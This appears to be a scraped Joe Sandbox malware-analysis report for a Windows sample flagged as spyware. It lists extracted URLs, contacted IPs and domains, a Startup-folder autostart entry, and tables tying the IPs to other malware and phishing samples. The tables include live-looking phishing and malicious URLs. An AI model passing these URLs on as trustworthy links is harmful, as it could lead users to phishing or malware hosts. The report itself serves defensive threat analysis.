                                                    http://isecure.reneelab.com.cn/webapi.php?code=RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.winimage.com/zLibDll1.2.6RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.vmware.com/0/RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://downloads.reneelab.com/passnow/passnow_RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.reneelab.net/RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.???.xx/?search=%sRescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://qt.digia.com/product/licensingRescueCDBurner.exe, 00000004.00000002.1574385035.000000006BDBE000.00000002.00000001.01000000.00000014.sdmpfalse
                                                        high
                                                        http://trolltech.com/xml/features/report-start-end-entityUnknownRescueCDBurner.exe, 00000003.00000002.1514140369.000000006C789000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1576085712.000000006D6B9000.00000002.00000001.01000000.00000015.sdmpfalse
                                                          high
                                                          http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/nRescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.symauth.com/cps0(RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.reneelab.com.cn/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstRescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.reneelab.it/reimpostare-passwordi-di-windows-login.htmlRescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://isecure.reneelab.com.cn/webapi.php?code=http://isecure-a.reneelab.com/webapi.php?code=http://RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.symauth.com/rpa00RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.info-zip.org/RescueCDBurner.exe, 00000003.00000002.1512217786.0000000009584000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A2C9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.00000000049F5000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1843503254.0000000009840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://trolltech.com/xml/features/report-start-end-entityRescueCDBurner.exe, 00000003.00000002.1514140369.000000006C789000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1576085712.000000006D6B9000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                  high
                                                                  http://www.winimage.com/zLibDllRescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                    high
http://www.reneelab.com/ | Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://isecure.reneelab.com/webapi.php?code= | Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply() | Source: RescueCDBurner.exe, 00000003.00000002.1514336862.000000006C859000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1576336443.000000006D789000.00000002.00000001.01000000.00000013.sdmp, RescueCDBurner.exe, 00000008.00000002.1846154668.000000006D889000.00000002.00000001.01000000.00000013.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/ | Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://trolltech.com/xml/features/report-whitespace-only-CharData | Source: RescueCDBurner.exe, 00000003.00000002.1514140369.000000006C789000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1576085712.000000006D6B9000.00000002.00000001.01000000.00000015.sdmp | Malicious: false | Reputation: high
http://www.surfok.de/ | Source: cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://downloads.reneelab.com.cn/passnow/passnow_ | Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.reneelab.biz/redefinir-senha-de-admin-logon-windows.htmlhttp://support.reneelab.com/anony | Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.softwareok.com | Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://appsyndication.org/2006/appsyn | Source: kXzODlqJak.exe | Malicious: false | Reputation: high
http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurcha | Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.65.161 | unknown | United States | 15169 | GOOGLEUS | false
104.70.121.146 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
162.159.61.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
40.79.167.8 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
20.110.205.119 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
204.79.197.219 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
172.64.41.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.70.121.192 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
18.173.219.111 | unknown | United States | 3 | MIT-GATEWAYSUS | false
18.244.18.38 | sb.scorecardresearch.com | United States | 16509 | AMAZON-02US | false
104.70.121.217 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
104.21.80.52 | bamarelakij.site | United States | 13335 | CLOUDFLARENETUS | false
184.51.149.176 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
                                                                          IP
                                                                          192.168.2.7
                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1586711
                                                                          Start date and time:2025-01-09 14:40:10 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 10m 55s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:29
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:kXzODlqJak.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:3785dc3dbc0410893f31c71fa977648063f1e498e28e6783261d81c7ab21c075.exe
                                                                          Detection:MAL
                                                                          Classification:mal92.spyw.evad.winEXE@64/279@19/15
                                                                          EGA Information:
                                                                          • Successful, ratio: 66.7%
                                                                          HCA Information:
                                                                          • Successful, ratio: 95%
                                                                          • Number of executed functions: 91
                                                                          • Number of non-executed functions: 271
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 199.232.210.172, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 142.250.185.238, 13.107.6.158, 108.141.37.120, 2.16.168.107, 2.16.168.120, 88.221.110.179, 88.221.110.195, 2.23.227.208, 2.23.227.215, 2.23.227.221, 2.21.65.132, 2.21.65.154, 13.74.129.1, 204.79.197.237, 13.107.21.237, 2.23.227.216, 2.23.227.197, 2.23.227.202, 2.16.168.122, 2.16.168.115, 48.209.164.47, 142.250.65.227, 142.250.80.3, 13.107.253.45, 52.149.20.212, 23.56.254.164, 94.245.104.56, 40.126.31.73, 13.107.246.40, 13.91.96.185, 20.96.153.111, 104.117.182.9, 23.200.0.34
                                                                          • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, prod-agic-we-5.westeurope.cloudapp.azure.com, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, time.windows.com, arc.msn.com, prod-agic-ne-4.northeurope.cloudapp.azure.com, www.bin
• Execution Graph export aborted for target RescueCDBurner.exe, PID 7828 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                          • Report size getting too big, too many NtWriteFile calls found.
                                                                          • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: kXzODlqJak.exe
Time | Type | Description
08:41:31 | API Interceptor | 1x Sleep call for process: kXzODlqJak.exe modified
08:42:12 | API Interceptor | 22x Sleep call for process: LocalCtrl_alpha_v3.exe modified
14:41:53 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helpmonitorv3.lnk
Match | Associated Sample Name / URL | Detection | Threat Name
162.159.61.3 | bc7EKCf.exe | malicious | StormKitty
162.159.61.3 | malw.hta | malicious | Branchlock Obfuscator
162.159.61.3 | malw.hta | malicious | Unknown
162.159.61.3 | Swift-TT680169 Report.svg | malicious | Branchlock Obfuscator
162.159.61.3 | SecurityScan_Release.exe | malicious | Unknown
162.159.61.3 | LVkAi4PBv6.exe | malicious | Unknown
162.159.61.3 | Mansourbank Swift-TT379733 Report.svg | malicious | Branchlock Obfuscator
162.159.61.3 | Mansourbank Swift-TT680169 Report.svg | malicious | Branchlock Obfuscator
162.159.61.3 | w3245.exe | malicious | Unknown
162.159.61.3 | 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | malicious | Remcos
40.79.167.8 | file.exe | malicious | Amadey, Stealc, Vidar
40.79.167.8 | 704b67b5-6bc9-dbd5-0710-60eb98e03983.eml | malicious | Unknown
40.79.167.8 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
40.79.167.8 | https://360merch-my.sharepoint.com/:u:/p/derek_cummins/Ee8aHkzMy41OgT5fOyc3qz4BdRJzT4bTlOlXY3v0Xazn9Q?e=hZ7jfl | malicious | Unknown
40.79.167.8 | https://support.microsoft.com/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44 | malicious | HTMLPhisher
40.79.167.8 | HImMAwx7yG.html | malicious | Unknown
40.79.167.8 | Factura.pdf | malicious | Unknown
40.79.167.8 | https://bauhausfurnituregroup-my.sharepoint.com/:f:/p/jcaviness/EuxDBQEPKl5GgFKsZtlqM6cBIeG-xo_6Y_SwA6y5sPoclQ?e=5%3ach0wDN&at=9&xsdata=MDV8MDJ8aGVscEB2Y2YuY29tfGViYjRlM2VmYWMxZjRjODhiZmIyMDhkYzkxMzRjYzAzfDVjMDJlODlhYjk2ODRkNGU5NjBkZTYyYzdjZDAyNzY2fDB8MHw2Mzg1NDQ5MDMyMDQzNjAxNTV8VW5rbm93bnxUV0ZwYkdac2IzZDhleUpXSWpvaU1DNHdMakF3TURBaUxDSlFJam9pVjJsdU16SWlMQ0pCVGlJNklrMWhhV3dpTENKWFZDSTZNbjA9fDB8fHw%3d&sdata=US9GVzlGQVVpb0tMcWU1c3BhSjB0bDkrajM4RFJGWStqanVhSkg0NVR2MD0%3d | malicious | HTMLPhisher
40.79.167.8 | https://onset2.onsetcomp.com/files/software/hoboware/3.7.28/HOBOware_Free_Setup.exe | malicious | Unknown
40.79.167.8 | invoice 700898 for wallcentre.com.shtml | malicious | Unknown
104.70.121.146 | file.exe | malicious | Amadey, Stealc, Vidar
104.70.121.146 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
104.70.121.146 | file.exe | malicious | Unknown
20.110.205.119 | cLm7ThwEvh.msi | malicious | Unknown
20.110.205.119 | bc7EKCf.exe | malicious | StormKitty
20.110.205.119 | LVkAi4PBv6.exe | malicious | Unknown
20.110.205.119 | w3245.exe | malicious | Unknown
20.110.205.119 | w3245.exe | malicious | Unknown
20.110.205.119 | 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | malicious | Remcos
20.110.205.119 | random.exe | malicious | Unknown
20.110.205.119 | random.exe | malicious | Unknown
20.110.205.119 | over.ps1 | malicious | Vidar
20.110.205.119 | 6684V5n83w.exe | malicious | Vidar
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bamarelakij.site | w3245.exe | malicious | Unknown | 104.21.80.52
bamarelakij.site | w3245.exe | malicious | Unknown | 104.21.80.52
chrome.cloudflare-dns.com | bc7EKCf.exe | malicious | StormKitty | 162.159.61.3
chrome.cloudflare-dns.com | Swift-TT680169 Report.svg | malicious | Branchlock Obfuscator | 162.159.61.3
chrome.cloudflare-dns.com | SecurityScan_Release.exe | malicious | Unknown | 162.159.61.3
chrome.cloudflare-dns.com | SecurityScan_Release.exe | malicious | Unknown | 172.64.41.3
chrome.cloudflare-dns.com | SecurityScan_Release.exe | malicious | Unknown | 162.159.61.3
chrome.cloudflare-dns.com | LVkAi4PBv6.exe | malicious | Unknown | 172.64.41.3
chrome.cloudflare-dns.com | Mansourbank Swift-TT379733 Report.svg | malicious | Branchlock Obfuscator | 172.64.41.3
chrome.cloudflare-dns.com | Mansourbank Swift-TT680169 Report.svg | malicious | Branchlock Obfuscator | 162.159.61.3
chrome.cloudflare-dns.com | w3245.exe | malicious | Unknown | 172.64.41.3
chrome.cloudflare-dns.com | w3245.exe | malicious | Unknown | 172.64.41.3
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | LVkAi4PBv6.exe | malicious | Unknown | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | Mansourbank Swift-TT680169 Report.svg | malicious | Branchlock Obfuscator | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | malicious | Remcos | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | random.exe | malicious | Unknown | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | over.ps1 | malicious | Vidar | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 6684V5n83w.exe | malicious | Vidar | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | Bp4LoSXw83.lnk | malicious | Unknown | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | BHgwhz3lGN.exe | malicious | Vidar | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | Tool_Unlock_v1.2.exe | malicious | Vidar | 94.245.104.56
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | JA7cOAGHym.exe | malicious | Vidar | 94.245.104.56
sb.scorecardresearch.com | bc7EKCf.exe | malicious | StormKitty | 18.244.18.27
sb.scorecardresearch.com | https://t.co/qNQo33w8wD | malicious | HTMLPhisher | 18.244.18.32
sb.scorecardresearch.com | http://indyhumane.org | malicious | Unknown |
                                                                                                                                            • 18.244.18.38
                                                                                                                                            LVkAi4PBv6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 18.244.18.32
                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 18.244.18.27
                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 18.244.18.32
                                                                                                                                            Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 18.173.166.9
                                                                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 13.32.110.104
                                                                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 18.244.18.27
                                                                                                                                            nv8401986_110422.exeGet hashmaliciousQjwmonkeyBrowse
                                                                                                                                            • 18.244.18.122
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Context
MICROSOFT-CORP-MSN-AS-BLOCKUS: cLm7ThwEvh.msi | malicious | Unknown
• 20.189.173.28
https://meliopayments.cloudfilesbureau.com/j319C | malicious | HTMLPhisher
• 13.107.253.45
https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglow | malicious | HTMLPhisher
• 20.42.73.31
mpsl.elf | malicious | Mirai
• 22.170.57.197
m68k.elf | malicious | Mirai
• 20.74.19.248
arm.elf | malicious | Mirai
• 20.64.30.232
arm7.elf | malicious | Mirai
• 22.183.20.33
ppc.elf | malicious | Mirai
• 20.162.225.223
spc.elf | malicious | Mirai
• 22.140.64.179
sh4.elf | malicious | Mirai
• 22.238.114.39
AKAMAI-ASN1EU: mpsl.elf | malicious | Mirai
• 23.78.146.158
m68k.elf | malicious | Mirai
• 23.63.23.113
spc.elf | malicious | Mirai
• 23.194.118.65
sh4.elf | malicious | Mirai
• 23.199.18.240
x86.elf | malicious | Mirai
• 23.77.244.206
bc7EKCf.exe | malicious | StormKitty
• 104.70.121.217
https://user-logln.net-protected.net/de/?code=9a7d7f86cffe7c7d6feaede517e284f4 | malicious | Unknown
• 23.2.73.221
https://mo.iecxtug.ru/eoQpd/ | malicious | Unknown
• 2.16.168.11
https://workdrive.zohopublic.com/writer/open/p369v1c9203e54b114ff78bf68159454d9c26 | malicious | Unknown
• 2.16.168.197
Your Google Account has been deleted due to Terms of Service violations.eml | malicious | Unknown
• 2.16.168.119
CLOUDFLARENETUS: https://meliopayments.cloudfilesbureau.com/j319C | malicious | HTMLPhisher
• 104.18.11.207
https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglow | malicious | HTMLPhisher
• 104.16.117.116
http://cipassoitalia.it | malicious | CAPTCHA Scam ClickFix
• 104.21.48.1
m68k.elf | malicious | Mirai
• 8.44.59.63
arm7.elf | malicious | Mirai
• 1.12.64.0
ppc.elf | malicious | Mirai
• 1.15.80.127
sh4.elf | malicious | Mirai
• 1.12.59.181
December Reconciliation QuanKang.exe | malicious | Unknown
• 104.21.48.1
http://lynxblog.net | malicious | Unknown
• 1.1.1.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1: cLm7ThwEvh.msi | malicious | Unknown
• 104.21.80.52
digitalisierungskonzept_muster.js | malicious | Unknown
• 104.21.80.52
NvOxePa.exe | malicious | LummaC
